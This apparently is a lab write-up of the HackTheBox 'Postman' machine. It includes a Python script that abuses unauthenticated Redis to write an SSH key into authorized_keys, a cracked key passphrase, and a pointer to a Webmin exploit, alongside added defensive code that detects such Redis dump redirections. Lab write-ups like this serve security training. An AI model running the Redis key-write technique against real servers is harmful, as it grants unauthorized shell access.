Preface
Author: 0x584A
Information Gathering
First, a port scan with nmap
# Nmap 7.80 scan initiated Sun Feb 16 06:37:34 2020 as: nmap -sV -sC -oA server postman.htb
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 16 07:01:34 2020 -- 1 IP address (1 host up) scanned in 1439.92 seconds
You can see that port 10000 is running a Webmin service.
I tried the exploit scripts I found, but none for Webmin 1.9* work: they all require a valid username and password first.
I was stuck for a while; then I found a hint on the forum (BBS) and rescanned all ports.
nmap -sV -sC -Pn -p- -oA server 10.10.10.160 --min-rate 4000
$ cat server.nmap
# Nmap 7.80 scan initiated Sun Feb 16 08:38:52 2020 as: nmap -sV -sC -Pn -p- -oA server --min-rate 4000 10.10.10.160
Warning: 10.10.10.160 giving up on port because retransmission cap hit (10).
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.21s latency).
Not shown: 65491 closed ports, 40 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 16 08:40:27 2020 -- 1 IP address (1 host up) scanned in 95.09 seconds
There is an extra Redis port, which means nmap's default scan does not include port 6379.
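The lesson above (the default top-1000 scan never touched 6379; only the -p- scan exposed Redis) is one a defender can turn into a routine check: diff a default scan against a full-port scan and report the ports only the full scan finds, so they get inventoried or firewalled. The following Python is an added example, not part of the original writeup; the two report excerpts are reconstructed from the nmap output quoted above, and the parser assumes nmap's normal-output column layout (PORT STATE SERVICE VERSION).

```python
import re
from typing import Dict

# Reconstructed excerpts of the two nmap normal-output reports quoted above
# (constructed for this example; only the port table lines are kept).
DEFAULT_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
10000/tcp open http MiniServ 1.910 (Webmin httpd)
"""

FULL_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
6379/tcp open redis Redis key-value store
10000/tcp open http MiniServ 1.910 (Webmin httpd)
"""

# <port>/<proto> <state> <service> [<version ...>]; whitespace width varies between
# nmap's own output and copy-pasted versions, so match on \s+ rather than columns.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_open_ports(report: str) -> Dict[int, str]:
    """Return {port: 'service version'} for every line whose state is 'open'."""
    ports: Dict[int, str] = {}
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            port = int(m.group(1))
            ports[port] = (m.group(4) + " " + (m.group(5) or "")).strip()
    return ports


def missed_by_default(default_report: str, full_report: str) -> Dict[int, str]:
    """Ports present only in the full (-p-) scan: what a top-1000 scan would have missed."""
    seen_by_default = parse_open_ports(default_report)
    seen_by_full = parse_open_ports(full_report)
    return {p: svc for p, svc in seen_by_full.items() if p not in seen_by_default}


if __name__ == "__main__":
    for port, svc in sorted(missed_by_default(DEFAULT_SCAN, FULL_SCAN).items()):
        print(f"only in full scan: {port}/tcp {svc}")
```

Run against real output, feed it two files written with -oN; anything the full scan adds is a service that was listening without anyone having noticed it in the default sweep.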
User Flag
OK, so there is an unauthenticated-access vulnerability; the next step is getting a shell.
After a lot of fiddling: no permission to save a file into root's /root/.ssh, and I couldn't find the web service's absolute path to write a webshell.
Same story with writing a cron job: insufficient permissions to save, and I was stuck again...
On the forum I noticed: "I got access with r.... user and found the i._....k file."
So I need to log in as the redis user, but I couldn't write files under /home/redis/.ssh.
Tried pulling information with CONFIG GET *
OK, I get it: write the key the way this document describes: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
But the Redis session kept dropping, so I wrote a simple script to write id_rsa automatically.
import redis
import random

# Random suffix so repeated runs do not collide on the same key name
name = random.randint(0, 999)
# Blank lines on both sides keep the RDB binary framing from corrupting the key line
id_rsa = "\n\nssh-rsa xxx<id_rsa>xxx\n\n"

r = redis.Redis(host='10.10.10.160', port=6379)
r.set(f'ss-key{name}', id_rsa)
print(f'set ss-key{name}')
# Point the RDB dump at the redis user's .ssh directory
r.config_set('dir', '/var/lib/redis/.ssh')
print('set config')
r.config_set('dbfilename', 'authorized_keys')
print('set config dbfilename')
# Dump the dataset: the key's value lands inside authorized_keys
r.save()
print('Yes!')
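From the defender's side, the write sequence in the script above (SET a key, CONFIG SET dir and dbfilename, SAVE) is a distinctive fingerprint: an RDB dump redirected into a .ssh, cron or web directory is never legitimate. The following Python is an added example, not part of the original writeup; it parses `redis-cli MONITOR` output (the sample lines, timestamps and client addresses are constructed for this example) and raises an alert when a SAVE/BGSAVE lands the dump in a sensitive location. The standard mitigations are the ones the packetstorm document implies: set requirepass, bind to loopback or an internal interface, keep protected-mode on, and rename or disable CONFIG with rename-command.

```python
import re
from typing import Dict, List

# Constructed sample of `redis-cli MONITOR` output mirroring the write sequence
# above (timestamps, db index and client addresses are made up).
MONITOR_LOG = r'''
1581859200.100001 [0 10.10.14.5:51234] "SET" "ss-key417" "\n\nssh-rsa AAAA...\n\n"
1581859200.200002 [0 10.10.14.5:51234] "CONFIG" "SET" "dir" "/var/lib/redis/.ssh"
1581859200.300003 [0 10.10.14.5:51234] "CONFIG" "SET" "dbfilename" "authorized_keys"
1581859200.400004 [0 10.10.14.5:51234] "SAVE"
1581859201.000005 [0 127.0.0.1:40000] "GET" "session:abc"
1581859201.100006 [0 127.0.0.1:40000] "CONFIG" "GET" "maxmemory"
'''

# One MONITOR line: <unix ts> [<db> <client addr>] "ARG" "ARG" ...
LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
# Quoted argument, allowing backslash escapes inside the quotes
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Locations where an RDB dump has no business landing.
SUSPICIOUS_DIRS = ("/.ssh", "/var/spool/cron", "/etc/cron", "/var/www", "/root")
SUSPICIOUS_FILES = ("authorized_keys", ".php", ".jsp", "crontab")


def parse_monitor(text: str):
    """Yield (timestamp, client, argv) for each well-formed MONITOR line."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            yield m.group("ts"), m.group("client"), ARG.findall(m.group("args"))


def detect_rdb_file_write(text: str) -> List[Dict[str, str]]:
    """Alert when CONFIG SET dir/dbfilename point the dump at a sensitive path and a
    SAVE/BGSAVE then writes it. dir and dbfilename are server-wide settings, so the
    tracked state is global rather than per connection."""
    state: Dict[str, Dict[str, str]] = {}   # "dir" / "dbfilename" -> {"value", "set_by"}
    alerts: List[Dict[str, str]] = []
    for ts, client, argv in parse_monitor(text):
        if not argv:
            continue
        cmd = argv[0].upper()
        if cmd == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
            key = argv[2].lower()
            if key in ("dir", "dbfilename"):
                state[key] = {"value": argv[3], "set_by": client}
        elif cmd in ("SAVE", "BGSAVE"):
            d = state.get("dir", {}).get("value", "")
            f = state.get("dbfilename", {}).get("value", "")
            if any(s in d for s in SUSPICIOUS_DIRS) or any(s in f for s in SUSPICIOUS_FILES):
                alerts.append({
                    "ts": ts,
                    "client": client,
                    "path": f"{d.rstrip('/')}/{f}",
                    "dir_set_by": state.get("dir", {}).get("set_by", "?"),
                    "dbfilename_set_by": state.get("dbfilename", {}).get("set_by", "?"),
                })
    return alerts


if __name__ == "__main__":
    for a in detect_rdb_file_write(MONITOR_LOG):
        print(f"[{a['ts']}] {a['client']} forced dump to {a['path']} "
              f"(dir set by {a['dir_set_by']}, dbfilename set by {a['dbfilename_set_by']})")
```

Because the state is global, a SAVE issued from a second connection after another client changed dir and dbfilename is still caught, and the alert names both the saver and the setters. MONITOR is expensive on a busy instance; for production use the same logic can be fed from a proxy or a short sampling window instead.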
Looking at the /home directory, there is a user Matt, and under /opt I found this user's id_rsa.back file.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
-----END RSA PRIVATE KEY-----
The recovered passphrase is: computer2008
But trying to log in as Matt was rejected; searching the sshd configuration, I found that SSH login for Matt is specifically disabled.
So just switch to Matt directly from the redis shell.
Root Flag
In the process list, webmin is running as root, so the goal here is still to get a shell via webmin.
root 682 1 0 12:21 ? 00:00:03 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
By now I know the password for Matt's account, so try running msf to get a shell: https://www.uedbox.com/post/59130/